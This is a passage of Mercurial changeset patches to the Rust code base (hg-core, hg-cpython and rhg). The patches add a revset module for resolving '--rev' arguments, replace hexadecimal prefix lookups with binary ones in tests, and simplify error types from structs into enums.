- } - /// Give the size of the shortest node prefix that determines /// the revision uniquely. /// @@ -117,16 +94,6 @@ node_prefix: NodePrefix, ) -> Result<Option<usize>, NodeMapError>; - /// Same as `unique_prefix_len_bin`, with the hexadecimal representation - /// of the prefix as input. - fn unique_prefix_len_hex( - &self, - idx: &impl RevlogIndex, - prefix: &str, - ) -> Result<Option<usize>, NodeMapError> { - self.unique_prefix_len_bin(idx, NodePrefix::from_hex(prefix)?) - } - /// Same as `unique_prefix_len_bin`, with a full `Node` as input fn unique_prefix_len_node( &self, @@ -802,6 +769,10 @@ ]) } + fn hex(s: &str) -> NodePrefix { + NodePrefix::from_hex(s).unwrap() + } + #[test] fn test_nt_debug() { let nt = sample_nodetree(); @@ -820,11 +791,11 @@ pad_insert(&mut idx, 1, "1234deadcafe"); let nt = NodeTree::from(vec![block! {1: Rev(1)}]); - assert_eq!(nt.find_hex(&idx, "1")?, Some(1)); - assert_eq!(nt.find_hex(&idx, "12")?, Some(1)); - assert_eq!(nt.find_hex(&idx, "1234de")?, Some(1)); - assert_eq!(nt.find_hex(&idx, "1a")?, None); - assert_eq!(nt.find_hex(&idx, "ab")?, None); + assert_eq!(nt.find_bin(&idx, hex("1"))?, Some(1)); + assert_eq!(nt.find_bin(&idx, hex("12"))?, Some(1)); + assert_eq!(nt.find_bin(&idx, hex("1234de"))?, Some(1)); + assert_eq!(nt.find_bin(&idx, hex("1a"))?, None); + assert_eq!(nt.find_bin(&idx, hex("ab"))?, None); // and with full binary Nodes assert_eq!(nt.find_node(&idx, idx.get(&1).unwrap())?, Some(1)); @@ -841,12 +812,12 @@ let nt = sample_nodetree(); - assert_eq!(nt.find_hex(&idx, "0"), Err(MultipleResults)); - assert_eq!(nt.find_hex(&idx, "01"), Ok(Some(9))); - assert_eq!(nt.find_hex(&idx, "00"), Err(MultipleResults)); - assert_eq!(nt.find_hex(&idx, "00a"), Ok(Some(0))); - assert_eq!(nt.unique_prefix_len_hex(&idx, "00a"), Ok(Some(3))); - assert_eq!(nt.find_hex(&idx, "000"), Ok(Some(NULL_REVISION))); + assert_eq!(nt.find_bin(&idx, hex("0")), Err(MultipleResults)); + assert_eq!(nt.find_bin(&idx, hex("01")), Ok(Some(9))); + 
assert_eq!(nt.find_bin(&idx, hex("00")), Err(MultipleResults)); + assert_eq!(nt.find_bin(&idx, hex("00a")), Ok(Some(0))); + assert_eq!(nt.unique_prefix_len_bin(&idx, hex("00a")), Ok(Some(3))); + assert_eq!(nt.find_bin(&idx, hex("000")), Ok(Some(NULL_REVISION))); } #[test] @@ -864,13 +835,13 @@ root: block![0: Block(1), 1:Block(3), 12: Rev(2)], masked_inner_blocks: 1, }; - assert_eq!(nt.find_hex(&idx, "10")?, Some(1)); - assert_eq!(nt.find_hex(&idx, "c")?, Some(2)); - assert_eq!(nt.unique_prefix_len_hex(&idx, "c")?, Some(1)); - assert_eq!(nt.find_hex(&idx, "00"), Err(MultipleResults)); - assert_eq!(nt.find_hex(&idx, "000")?, Some(NULL_REVISION)); - assert_eq!(nt.unique_prefix_len_hex(&idx, "000")?, Some(3)); - assert_eq!(nt.find_hex(&idx, "01")?, Some(9)); + assert_eq!(nt.find_bin(&idx, hex("10"))?, Some(1)); + assert_eq!(nt.find_bin(&idx, hex("c"))?, Some(2)); + assert_eq!(nt.unique_prefix_len_bin(&idx, hex("c"))?, Some(1)); + assert_eq!(nt.find_bin(&idx, hex("00")), Err(MultipleResults)); + assert_eq!(nt.find_bin(&idx, hex("000"))?, Some(NULL_REVISION)); + assert_eq!(nt.unique_prefix_len_bin(&idx, hex("000"))?, Some(3)); + assert_eq!(nt.find_bin(&idx, hex("01"))?, Some(9)); assert_eq!(nt.masked_readonly_blocks(), 2); Ok(()) } @@ -903,14 +874,14 @@ &self, prefix: &str, ) -> Result<Option<Revision>, NodeMapError> { - self.nt.find_hex(&self.index, prefix) + self.nt.find_bin(&self.index, hex(prefix)) } fn unique_prefix_len_hex( &self, prefix: &str, ) -> Result<Option<usize>, NodeMapError> { - self.nt.unique_prefix_len_hex(&self.index, prefix) + self.nt.unique_prefix_len_bin(&self.index, hex(prefix)) } /// Drain `added` and restart a new one diff --git a/rust/hg-cpython/src/revlog.rs b/rust/hg-cpython/src/revlog.rs --- a/rust/hg-cpython/src/revlog.rs +++ b/rust/hg-cpython/src/revlog.rs @@ -17,7 +17,7 @@ }; use hg::{ nodemap::{Block, NodeMapError, NodeTree}, - revlog::{nodemap::NodeMap, RevlogIndex}, + revlog::{nodemap::NodeMap, NodePrefix, RevlogIndex}, Revision, }; 
use std::cell::RefCell; @@ -107,7 +107,9 @@ String::from_utf8_lossy(node.data(py)).to_string() }; - nt.find_hex(idx, &node_as_string) + let prefix = NodePrefix::from_hex(&node_as_string).map_err(|_| PyErr::new::<ValueError, _>(py, "Invalid node or prefix"))?; + + nt.find_bin(idx, prefix) // TODO make an inner API returning the node directly .map(|opt| opt.map( |rev| PyBytes::new(py, idx.node(rev).unwrap().as_bytes()))) @@ -468,9 +470,6 @@ match err { NodeMapError::MultipleResults => revlog_error(py), NodeMapError::RevisionNotInIndex(r) => rev_not_in_index(py, r), - NodeMapError::InvalidNodePrefix => { - PyErr::new::<ValueError, _>(py, "Invalid node or prefix") - } } } # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611682306 -3600 # Tue Jan 26 18:31:46 2021 +0100 # Node ID 4b381dbbf8b7a42e7f6e7e7d68e04886370d8aa7 # Parent 18a261b11b202abc79f765c360bd76d204ec9fef rhg: centralize parsing of `--rev` CLI arguments This new module will be the place to implement more of the revset language when we do so. Differential Revision: https://phab.mercurial-scm.org/D9873 diff --git a/rust/hg-core/src/lib.rs b/rust/hg-core/src/lib.rs --- a/rust/hg-core/src/lib.rs +++ b/rust/hg-core/src/lib.rs @@ -28,6 +28,7 @@ pub use revlog::*; pub mod config; pub mod operations; +pub mod revset; pub mod utils; use crate::utils::hg_path::{HgPathBuf, HgPathError}; diff --git a/rust/hg-core/src/operations/cat.rs b/rust/hg-core/src/operations/cat.rs --- a/rust/hg-core/src/operations/cat.rs +++ b/rust/hg-core/src/operations/cat.rs @@ -15,8 +15,6 @@ use crate::revlog::revlog::Revlog; use crate::revlog::revlog::RevlogError; use crate::revlog::Node; -use crate::revlog::NodePrefix; -use crate::revlog::Revision; use crate::utils::files::get_path_from_bytes; use crate::utils::hg_path::{HgPath, HgPathBuf}; @@ -77,23 +75,15 @@ /// * `files`: The files to output. 
pub fn cat( repo: &Repo, - rev: &str, + revset: &str, files: &[HgPathBuf], ) -> Result<Vec<u8>, CatRevError> { + let rev = crate::revset::resolve_single(revset, repo)?; let changelog = Changelog::open(repo)?; let manifest = Manifest::open(repo)?; - - let changelog_entry = match rev.parse::<Revision>() { - Ok(rev) => changelog.get_rev(rev)?, - _ => { - let changelog_node = NodePrefix::from_hex(&rev) - .map_err(|_| CatRevErrorKind::InvalidRevision)?; - changelog.get_node(changelog_node)? - } - }; + let changelog_entry = changelog.get_rev(rev)?; let manifest_node = Node::from_hex(&changelog_entry.manifest_node()?) .map_err(|_| CatRevErrorKind::CorruptedRevlog)?; - let manifest_entry = manifest.get_node(manifest_node.into())?; let mut bytes = vec![]; diff --git a/rust/hg-core/src/operations/debugdata.rs b/rust/hg-core/src/operations/debugdata.rs --- a/rust/hg-core/src/operations/debugdata.rs +++ b/rust/hg-core/src/operations/debugdata.rs @@ -7,8 +7,6 @@ use crate::repo::Repo; use crate::revlog::revlog::{Revlog, RevlogError}; -use crate::revlog::NodePrefix; -use crate::revlog::Revision; /// Kind of data to debug #[derive(Debug, Copy, Clone)] @@ -79,7 +77,7 @@ /// Dump the contents data of a revision. pub fn debug_data( repo: &Repo, - rev: &str, + revset: &str, kind: DebugDataKind, ) -> Result<Vec<u8>, DebugDataError> { let index_file = match kind { @@ -87,16 +85,8 @@ DebugDataKind::Manifest => "00manifest.i", }; let revlog = Revlog::open(repo, index_file, None)?; - - let data = match rev.parse::<Revision>() { - Ok(rev) => revlog.get_rev_data(rev)?, - _ => { - let node = NodePrefix::from_hex(&rev) - .map_err(|_| DebugDataErrorKind::InvalidRevision)?; - let rev = revlog.get_node_rev(node)?; - revlog.get_rev_data(rev)? 
- } - }; - + let rev = + crate::revset::resolve_rev_number_or_hex_prefix(revset, &revlog)?; + let data = revlog.get_rev_data(rev)?; Ok(data) } diff --git a/rust/hg-core/src/operations/list_tracked_files.rs b/rust/hg-core/src/operations/list_tracked_files.rs --- a/rust/hg-core/src/operations/list_tracked_files.rs +++ b/rust/hg-core/src/operations/list_tracked_files.rs @@ -9,9 +9,8 @@ use crate::repo::Repo; use crate::revlog::changelog::Changelog; use crate::revlog::manifest::{Manifest, ManifestEntry}; -use crate::revlog::node::{Node, NodePrefix}; +use crate::revlog::node::Node; use crate::revlog::revlog::RevlogError; -use crate::revlog::Revision; use crate::utils::hg_path::HgPath; use crate::{DirstateParseError, EntryState}; use rayon::prelude::*; @@ -137,19 +136,12 @@ /// List files under Mercurial control at a given revision. pub fn list_rev_tracked_files( repo: &Repo, - rev: &str, + revset: &str, ) -> Result<FilesForRev, ListRevTrackedFilesError> { + let rev = crate::revset::resolve_single(revset, repo)?; let changelog = Changelog::open(repo)?; let manifest = Manifest::open(repo)?; - - let changelog_entry = match rev.parse::<Revision>() { - Ok(rev) => changelog.get_rev(rev)?, - _ => { - let changelog_node = NodePrefix::from_hex(&rev) - .or(Err(ListRevTrackedFilesErrorKind::InvalidRevision))?; - changelog.get_node(changelog_node)? - } - }; + let changelog_entry = changelog.get_rev(rev)?; let manifest_node = Node::from_hex(&changelog_entry.manifest_node()?) .or(Err(ListRevTrackedFilesErrorKind::CorruptedRevlog))?; let manifest_entry = manifest.get_node(manifest_node.into())?; diff --git a/rust/hg-core/src/revlog/changelog.rs b/rust/hg-core/src/revlog/changelog.rs --- a/rust/hg-core/src/revlog/changelog.rs +++ b/rust/hg-core/src/revlog/changelog.rs @@ -6,7 +6,7 @@ /// A specialized `Revlog` to work with `changelog` data format. pub struct Changelog { /// The generic `revlog` format. 
- revlog: Revlog, + pub(crate) revlog: Revlog, } impl Changelog { diff --git a/rust/hg-core/src/revlog/revlog.rs b/rust/hg-core/src/revlog/revlog.rs --- a/rust/hg-core/src/revlog/revlog.rs +++ b/rust/hg-core/src/revlog/revlog.rs @@ -150,6 +150,11 @@ found_by_prefix.ok_or(RevlogError::InvalidRevision) } + /// Returns whether the given revision exists in this revlog. + pub fn has_rev(&self, rev: Revision) -> bool { + self.index.get_entry(rev).is_some() + } + /// Return the full data associated to a revision. /// /// All entries required to build the final data out of deltas will be diff --git a/rust/hg-core/src/revset.rs b/rust/hg-core/src/revset.rs new file mode 100644 --- /dev/null +++ b/rust/hg-core/src/revset.rs @@ -0,0 +1,53 @@ +//! The revset query language +//! +//! <https://www.mercurial-scm.org/repo/hg/help/revsets> + +use crate::repo::Repo; +use crate::revlog::changelog::Changelog; +use crate::revlog::revlog::{Revlog, RevlogError}; +use crate::revlog::NodePrefix; +use crate::revlog::{Revision, NULL_REVISION}; + +/// Resolve a query string into a single revision. +/// +/// Only some of the revset language is implemented yet. +pub fn resolve_single( + input: &str, + repo: &Repo, +) -> Result<Revision, RevlogError> { + let changelog = Changelog::open(repo)?; + + match resolve_rev_number_or_hex_prefix(input, &changelog.revlog) { + Err(RevlogError::InvalidRevision) => {} // Try other syntax + result => return result, + } + + if input == "null" { + return Ok(NULL_REVISION); + } + + // TODO: support for the rest of the language here. + + Err(RevlogError::InvalidRevision) +} + +/// Resolve the small subset of the language suitable for revlogs other than +/// the changelog, such as in `hg debugdata --manifest` CLI argument. 
+/// +/// * A non-negative decimal integer for a revision number, or +/// * An hexadecimal string, for the unique node ID that starts with this +/// prefix +pub fn resolve_rev_number_or_hex_prefix( + input: &str, + revlog: &Revlog, +) -> Result<Revision, RevlogError> { + if let Ok(integer) = input.parse::<i32>() { + if integer >= 0 && revlog.has_rev(integer) { + return Ok(integer); + } + } + if let Ok(prefix) = NodePrefix::from_hex(input) { + return revlog.get_node_rev(prefix); + } + Err(RevlogError::InvalidRevision) +} # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611684444 -3600 # Tue Jan 26 19:07:24 2021 +0100 # Node ID 3e2d539d0d1a6390677c2d18bb8aa4fe241a8ae2 # Parent 4b381dbbf8b7a42e7f6e7e7d68e04886370d8aa7 rust: remove `FooError` structs with only `kind: FooErrorKind` enum field Use the enum directly as `FooError` instead. Differential Revision: https://phab.mercurial-scm.org/D9874 diff --git a/rust/hg-core/src/operations/cat.rs b/rust/hg-core/src/operations/cat.rs --- a/rust/hg-core/src/operations/cat.rs +++ b/rust/hg-core/src/operations/cat.rs @@ -20,9 +20,9 @@ const METADATA_DELIMITER: [u8; 2] = [b'\x01', b'\n']; -/// Kind of error encountered by `CatRev` +/// Error type for `cat` #[derive(Debug)] -pub enum CatRevErrorKind { +pub enum CatRevError { /// Error when reading a `revlog` file. IoError(std::io::Error), /// The revision has not been found. 
@@ -37,34 +37,20 @@ UnknowRevlogDataFormat(u8), } -/// A `CatRev` error -#[derive(Debug)] -pub struct CatRevError { - /// Kind of error encountered by `CatRev` - pub kind: CatRevErrorKind, -} - -impl From<CatRevErrorKind> for CatRevError { - fn from(kind: CatRevErrorKind) -> Self { - CatRevError { kind } - } -} - impl From<RevlogError> for CatRevError { fn from(err: RevlogError) -> Self { match err { - RevlogError::IoError(err) => CatRevErrorKind::IoError(err), + RevlogError::IoError(err) => CatRevError::IoError(err), RevlogError::UnsuportedVersion(version) => { - CatRevErrorKind::UnsuportedRevlogVersion(version) + CatRevError::UnsuportedRevlogVersion(version) } - RevlogError::InvalidRevision => CatRevErrorKind::InvalidRevision, - RevlogError::AmbiguousPrefix => CatRevErrorKind::AmbiguousPrefix, - RevlogError::Corrupted => CatRevErrorKind::CorruptedRevlog, + RevlogError::InvalidRevision => CatRevError::InvalidRevision, + RevlogError::AmbiguousPrefix => CatRevError::AmbiguousPrefix, + RevlogError::Corrupted => CatRevError::CorruptedRevlog, RevlogError::UnknowDataFormat(format) => { - CatRevErrorKind::UnknowRevlogDataFormat(format) + CatRevError::UnknowRevlogDataFormat(format) } } - .into() } } @@ -83,7 +69,7 @@ let manifest = Manifest::open(repo)?; let changelog_entry = changelog.get_rev(rev)?; let manifest_node = Node::from_hex(&changelog_entry.manifest_node()?) 
- .map_err(|_| CatRevErrorKind::CorruptedRevlog)?; + .map_err(|_| CatRevError::CorruptedRevlog)?; let manifest_entry = manifest.get_node(manifest_node.into())?; let mut bytes = vec![]; @@ -96,7 +82,7 @@ let file_log = Revlog::open(repo, &index_path, Some(&data_path))?; let file_node = Node::from_hex(node_bytes) - .map_err(|_| CatRevErrorKind::CorruptedRevlog)?; + .map_err(|_| CatRevError::CorruptedRevlog)?; let file_rev = file_log.get_node_rev(file_node.into())?; let data = file_log.get_rev_data(file_rev)?; if data.starts_with(&METADATA_DELIMITER) { diff --git a/rust/hg-core/src/operations/debugdata.rs b/rust/hg-core/src/operations/debugdata.rs --- a/rust/hg-core/src/operations/debugdata.rs +++ b/rust/hg-core/src/operations/debugdata.rs @@ -15,9 +15,9 @@ Manifest, } -/// Kind of error encountered by DebugData +/// Error type for `debug_data` #[derive(Debug)] -pub enum DebugDataErrorKind { +pub enum DebugDataError { /// Error when reading a `revlog` file. IoError(std::io::Error), /// The revision has not been found. 
@@ -32,45 +32,26 @@ UnknowRevlogDataFormat(u8), } -/// A DebugData error -#[derive(Debug)] -pub struct DebugDataError { - /// Kind of error encountered by DebugData - pub kind: DebugDataErrorKind, -} - -impl From<DebugDataErrorKind> for DebugDataError { - fn from(kind: DebugDataErrorKind) -> Self { - DebugDataError { kind } - } -} - impl From<std::io::Error> for DebugDataError { fn from(err: std::io::Error) -> Self { - let kind = DebugDataErrorKind::IoError(err); - DebugDataError { kind } + DebugDataError::IoError(err) } } impl From<RevlogError> for DebugDataError { fn from(err: RevlogError) -> Self { match err { - RevlogError::IoError(err) => DebugDataErrorKind::IoError(err), + RevlogError::IoError(err) => DebugDataError::IoError(err), RevlogError::UnsuportedVersion(version) => { - DebugDataErrorKind::UnsuportedRevlogVersion(version) - } - RevlogError::InvalidRevision => { - DebugDataErrorKind::InvalidRevision + DebugDataError::UnsuportedRevlogVersion(version) } - RevlogError::AmbiguousPrefix => { - DebugDataErrorKind::AmbiguousPrefix - } - RevlogError::Corrupted => DebugDataErrorKind::CorruptedRevlog, + RevlogError::InvalidRevision => DebugDataError::InvalidRevision, + RevlogError::AmbiguousPrefix => DebugDataError::AmbiguousPrefix, + RevlogError::Corrupted => DebugDataError::CorruptedRevlog, RevlogError::UnknowDataFormat(format) => { - DebugDataErrorKind::UnknowRevlogDataFormat(format) + DebugDataError::UnknowRevlogDataFormat(format) } } - .into() } } diff --git a/rust/hg-core/src/operations/find_root.rs b/rust/hg-core/src/operations/find_root.rs --- a/rust/hg-core/src/operations/find_root.rs +++ b/rust/hg-core/src/operations/find_root.rs @@ -1,9 +1,8 @@ -use std::fmt; use std::path::{Path, PathBuf}; -/// Kind of error encoutered by FindRoot +/// Error type for `find_root` #[derive(Debug)] -pub enum FindRootErrorKind { +pub enum FindRootError { /// Root of the repository has not been found /// Contains the current directory used by FindRoot 
RootNotFound(PathBuf), @@ -12,28 +11,12 @@ GetCurrentDirError(std::io::Error), } -/// A FindRoot error -#[derive(Debug)] -pub struct FindRootError { - /// Kind of error encoutered by FindRoot - pub kind: FindRootErrorKind, -} - -impl std::error::Error for FindRootError {} - -impl fmt::Display for FindRootError { - fn fmt(&self, _f: &mut fmt::Formatter<'_>) -> fmt::Result { - unimplemented!() - } -} - /// Find the root of the repository /// by searching for a .hg directory in the process’ current directory and its /// ancestors pub fn find_root() -> Result<PathBuf, FindRootError> { - let current_dir = std::env::current_dir().map_err(|e| FindRootError { - kind: FindRootErrorKind::GetCurrentDirError(e), - })?; + let current_dir = std::env::current_dir() + .map_err(|e| FindRootError::GetCurrentDirError(e))?; Ok(find_root_from_path(¤t_dir)?.into()) } @@ -48,9 +31,7 @@ return Ok(ancestor); } } - Err(FindRootError { - kind: FindRootErrorKind::RootNotFound(start.into()), - }) + Err(FindRootError::RootNotFound(start.into())) } #[cfg(test)] @@ -68,10 +49,8 @@ // TODO do something better assert!(match err { - FindRootError { kind } => match kind { - FindRootErrorKind::RootNotFound(p) => p == path.to_path_buf(), - _ => false, - }, + FindRootError::RootNotFound(p) => p == path.to_path_buf(), + _ => false, }) } diff --git a/rust/hg-core/src/operations/list_tracked_files.rs b/rust/hg-core/src/operations/list_tracked_files.rs --- a/rust/hg-core/src/operations/list_tracked_files.rs +++ b/rust/hg-core/src/operations/list_tracked_files.rs @@ -16,34 +16,18 @@ use rayon::prelude::*; use std::convert::From; -/// Kind of error encountered by `ListDirstateTrackedFiles` +/// Error type for `Dirstate` methods #[derive(Debug)] -pub enum ListDirstateTrackedFilesErrorKind { +pub enum ListDirstateTrackedFilesError { /// Error when reading the `dirstate` file IoError(std::io::Error), /// Error when parsing the `dirstate` file ParseError(DirstateParseError), } -/// A `ListDirstateTrackedFiles` 
error -#[derive(Debug)] -pub struct ListDirstateTrackedFilesError { - /// Kind of error encountered by `ListDirstateTrackedFiles` - pub kind: ListDirstateTrackedFilesErrorKind, -} - -impl From<ListDirstateTrackedFilesErrorKind> - for ListDirstateTrackedFilesError -{ - fn from(kind: ListDirstateTrackedFilesErrorKind) -> Self { - ListDirstateTrackedFilesError { kind } - } -} - impl From<std::io::Error> for ListDirstateTrackedFilesError { fn from(err: std::io::Error) -> Self { - let kind = ListDirstateTrackedFilesErrorKind::IoError(err); - ListDirstateTrackedFilesError { kind } + ListDirstateTrackedFilesError::IoError(err) } } @@ -64,7 +48,7 @@ &self, ) -> Result<Vec<&HgPath>, ListDirstateTrackedFilesError> { let (_, entries, _) = parse_dirstate(&self.content) - .map_err(ListDirstateTrackedFilesErrorKind::ParseError)?; + .map_err(ListDirstateTrackedFilesError::ParseError)?; let mut files: Vec<&HgPath> = entries .into_iter() .filter_map(|(path, entry)| match entry.state { @@ -77,9 +61,9 @@ } } -/// Kind of error encountered by `ListRevTrackedFiles` +/// Error type for `list_rev_tracked_files` #[derive(Debug)] -pub enum ListRevTrackedFilesErrorKind { +pub enum ListRevTrackedFilesError { /// Error when reading a `revlog` file. IoError(std::io::Error), /// The revision has not been found.
@@ -94,42 +78,28 @@ UnknowRevlogDataFormat(u8), } -/// A `ListRevTrackedFiles` error -#[derive(Debug)] -pub struct ListRevTrackedFilesError { - /// Kind of error encountered by `ListRevTrackedFiles` - pub kind: ListRevTrackedFilesErrorKind, -} - -impl From<ListRevTrackedFilesErrorKind> for ListRevTrackedFilesError { - fn from(kind: ListRevTrackedFilesErrorKind) -> Self { - ListRevTrackedFilesError { kind } - } -} - impl From<RevlogError> for ListRevTrackedFilesError { fn from(err: RevlogError) -> Self { match err { RevlogError::IoError(err) => { - ListRevTrackedFilesErrorKind::IoError(err) + ListRevTrackedFilesError::IoError(err) } RevlogError::UnsuportedVersion(version) => { - ListRevTrackedFilesErrorKind::UnsuportedRevlogVersion(version) + ListRevTrackedFilesError::UnsuportedRevlogVersion(version) } RevlogError::InvalidRevision => { - ListRevTrackedFilesErrorKind::InvalidRevision + ListRevTrackedFilesError::InvalidRevision } RevlogError::AmbiguousPrefix => { - ListRevTrackedFilesErrorKind::AmbiguousPrefix + ListRevTrackedFilesError::AmbiguousPrefix } RevlogError::Corrupted => { - ListRevTrackedFilesErrorKind::CorruptedRevlog + ListRevTrackedFilesError::CorruptedRevlog } RevlogError::UnknowDataFormat(format) => { - ListRevTrackedFilesErrorKind::UnknowRevlogDataFormat(format) + ListRevTrackedFilesError::UnknowRevlogDataFormat(format) } } - .into() } } @@ -143,7 +113,7 @@ let manifest = Manifest::open(repo)?; let changelog_entry = changelog.get_rev(rev)?; let manifest_node = Node::from_hex(&changelog_entry.manifest_node()?) 
- .or(Err(ListRevTrackedFilesErrorKind::CorruptedRevlog))?; + .or(Err(ListRevTrackedFilesError::CorruptedRevlog))?; let manifest_entry = manifest.get_node(manifest_node.into())?; Ok(FilesForRev(manifest_entry)) } diff --git a/rust/hg-core/src/operations/mod.rs b/rust/hg-core/src/operations/mod.rs --- a/rust/hg-core/src/operations/mod.rs +++ b/rust/hg-core/src/operations/mod.rs @@ -7,17 +7,10 @@ mod dirstate_status; mod find_root; mod list_tracked_files; -pub use cat::{cat, CatRevError, CatRevErrorKind}; -pub use debugdata::{ - debug_data, DebugDataError, DebugDataErrorKind, DebugDataKind, -}; -pub use find_root::{ - find_root, find_root_from_path, FindRootError, FindRootErrorKind, -}; +pub use cat::{cat, CatRevError}; +pub use debugdata::{debug_data, DebugDataError, DebugDataKind}; +pub use find_root::{find_root, find_root_from_path, FindRootError}; pub use list_tracked_files::{ list_rev_tracked_files, FilesForRev, ListRevTrackedFilesError, - ListRevTrackedFilesErrorKind, }; -pub use list_tracked_files::{ - Dirstate, ListDirstateTrackedFilesError, ListDirstateTrackedFilesErrorKind, -}; +pub use list_tracked_files::{Dirstate, ListDirstateTrackedFilesError}; diff --git a/rust/rhg/src/commands/cat.rs b/rust/rhg/src/commands/cat.rs --- a/rust/rhg/src/commands/cat.rs +++ b/rust/rhg/src/commands/cat.rs @@ -1,8 +1,8 @@ use crate::commands::Command; -use crate::error::{CommandError, CommandErrorKind}; +use crate::error::CommandError; use crate::ui::utf8_to_local; use crate::ui::Ui; -use hg::operations::{cat, CatRevError, CatRevErrorKind}; +use hg::operations::{cat, CatRevError}; use hg::repo::Repo; use hg::utils::hg_path::HgPathBuf; use micro_timer::timed; @@ -34,16 +34,16 @@ let repo = Repo::find()?; repo.check_requirements()?; let cwd = std::env::current_dir() - .or_else(|e| Err(CommandErrorKind::CurrentDirNotFound(e)))?; + .or_else(|e| Err(CommandError::CurrentDirNotFound(e)))?; let mut files = vec![]; for file in self.files.iter() { let normalized = cwd.join(&file); 
let stripped = normalized .strip_prefix(&repo.working_directory_path()) - .or(Err(CommandErrorKind::Abort(None)))?; + .or(Err(CommandError::Abort(None)))?; let hg_file = HgPathBuf::try_from(stripped.to_path_buf()) - .or(Err(CommandErrorKind::Abort(None)))?; + .or(Err(CommandError::Abort(None)))?; files.push(hg_file); } @@ -53,53 +53,51 @@ .map_err(|e| map_rev_error(rev, e))?; self.display(ui, &data) } - None => Err(CommandErrorKind::Unimplemented.into()), + None => Err(CommandError::Unimplemented.into()), } } } -/// Convert `CatRevErrorKind` to `CommandError` +/// Convert `CatRevError` to `CommandError` fn map_rev_error(rev: &str, err: CatRevError) -> CommandError { - CommandError { - kind: match err.kind { - CatRevErrorKind::IoError(err) => CommandErrorKind::Abort(Some( - utf8_to_local(&format!("abort: {}\n", err)).into(), - )), - CatRevErrorKind::InvalidRevision => CommandErrorKind::Abort(Some( + match err { + CatRevError::IoError(err) => CommandError::Abort(Some( + utf8_to_local(&format!("abort: {}\n", err)).into(), + )), + CatRevError::InvalidRevision => CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: invalid revision identifier {}\n", + rev + )) + .into(), + )), + CatRevError::AmbiguousPrefix => CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: ambiguous revision identifier {}\n", + rev + )) + .into(), + )), + CatRevError::UnsuportedRevlogVersion(version) => { + CommandError::Abort(Some( utf8_to_local(&format!( - "abort: invalid revision identifier {}\n", - rev - )) - .into(), - )), - CatRevErrorKind::AmbiguousPrefix => CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: ambiguous revision identifier {}\n", - rev + "abort: unsupported revlog version {}\n", + version )) .into(), - )), - CatRevErrorKind::UnsuportedRevlogVersion(version) => { - CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: unsupported revlog version {}\n", - version - )) - .into(), + )) + } + CatRevError::CorruptedRevlog => { + 
CommandError::Abort(Some("abort: corrupted revlog\n".into())) + } + CatRevError::UnknowRevlogDataFormat(format) => { + CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: unknow revlog dataformat {:?}\n", + format )) - } - CatRevErrorKind::CorruptedRevlog => CommandErrorKind::Abort(Some( - "abort: corrupted revlog\n".into(), - )), - CatRevErrorKind::UnknowRevlogDataFormat(format) => { - CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: unknow revlog dataformat {:?}\n", - format - )) - .into(), - )) - } - }, + .into(), + )) + } } } diff --git a/rust/rhg/src/commands/debugdata.rs b/rust/rhg/src/commands/debugdata.rs --- a/rust/rhg/src/commands/debugdata.rs +++ b/rust/rhg/src/commands/debugdata.rs @@ -1,10 +1,8 @@ use crate::commands::Command; -use crate::error::{CommandError, CommandErrorKind}; +use crate::error::CommandError; use crate::ui::utf8_to_local; use crate::ui::Ui; -use hg::operations::{ - debug_data, DebugDataError, DebugDataErrorKind, DebugDataKind, -}; +use hg::operations::{debug_data, DebugDataError, DebugDataKind}; use hg::repo::Repo; use micro_timer::timed; @@ -40,52 +38,44 @@ /// Convert operation errors to command errors fn to_command_error(rev: &str, err: DebugDataError) -> CommandError { - match err.kind { - DebugDataErrorKind::IoError(err) => CommandError { - kind: CommandErrorKind::Abort(Some( - utf8_to_local(&format!("abort: {}\n", err)).into(), - )), - }, - DebugDataErrorKind::InvalidRevision => CommandError { - kind: CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: invalid revision identifier{}\n", - rev - )) - .into(), - )), - }, - DebugDataErrorKind::AmbiguousPrefix => CommandError { - kind: CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: ambiguous revision identifier{}\n", - rev - )) - .into(), - )), - }, - DebugDataErrorKind::UnsuportedRevlogVersion(version) => CommandError { - kind: CommandErrorKind::Abort(Some( + match err { + DebugDataError::IoError(err) => 
CommandError::Abort(Some( + utf8_to_local(&format!("abort: {}\n", err)).into(), + )), + DebugDataError::InvalidRevision => CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: invalid revision identifier{}\n", + rev + )) + .into(), + )), + DebugDataError::AmbiguousPrefix => CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: ambiguous revision identifier{}\n", + rev + )) + .into(), + )), + DebugDataError::UnsuportedRevlogVersion(version) => { + CommandError::Abort(Some( utf8_to_local(&format!( "abort: unsupported revlog version {}\n", version )) .into(), - )), - }, - DebugDataErrorKind::CorruptedRevlog => CommandError { - kind: CommandErrorKind::Abort(Some( - "abort: corrupted revlog\n".into(), - )), - }, - DebugDataErrorKind::UnknowRevlogDataFormat(format) => CommandError { - kind: CommandErrorKind::Abort(Some( + )) + } + DebugDataError::CorruptedRevlog => { + CommandError::Abort(Some("abort: corrupted revlog\n".into())) + } + DebugDataError::UnknowRevlogDataFormat(format) => { + CommandError::Abort(Some( utf8_to_local(&format!( "abort: unknow revlog dataformat {:?}\n", format )) .into(), - )), - }, + )) + } } } diff --git a/rust/rhg/src/commands/files.rs b/rust/rhg/src/commands/files.rs --- a/rust/rhg/src/commands/files.rs +++ b/rust/rhg/src/commands/files.rs @@ -1,14 +1,9 @@ use crate::commands::Command; -use crate::error::{CommandError, CommandErrorKind}; +use crate::error::CommandError; use crate::ui::utf8_to_local; use crate::ui::Ui; -use hg::operations::{ - list_rev_tracked_files, ListRevTrackedFilesError, - ListRevTrackedFilesErrorKind, -}; -use hg::operations::{ - Dirstate, ListDirstateTrackedFilesError, ListDirstateTrackedFilesErrorKind, -}; +use hg::operations::{list_rev_tracked_files, ListRevTrackedFilesError}; +use hg::operations::{Dirstate, ListDirstateTrackedFilesError}; use hg::repo::Repo; use hg::utils::files::{get_bytes_from_path, relativize_path}; use hg::utils::hg_path::{HgPath, HgPathBuf}; @@ -35,7 +30,7 @@ files: impl 
